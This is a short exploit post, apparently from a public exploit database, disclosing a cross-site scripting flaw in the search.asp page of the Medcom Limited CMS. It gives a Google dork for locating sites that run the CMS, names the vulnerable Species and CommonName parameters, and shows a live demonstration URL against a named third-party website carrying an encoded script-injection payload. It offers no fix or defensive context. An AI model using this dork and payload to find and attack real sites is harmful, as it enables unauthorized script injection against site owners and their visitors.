# Exploit Title:Medcom Limited cms Cross Site Scripting Vulnerability # # Google Dork: Intext:" Powered by Medcom Limited" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://medcom.com.hk # # Tested on: all # ================================== [+] Species & CommonName parametrs in search.asp are Vulnerable to xss [+] target/search.asp?Family=&Species=[htmlcode]&CommonName=[htmlcode]&Submit=Submit D3m0: http://www.efishalbum.com/search.asp?Family=&Species=%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E&CommonName=%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E&Submit=Submit ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369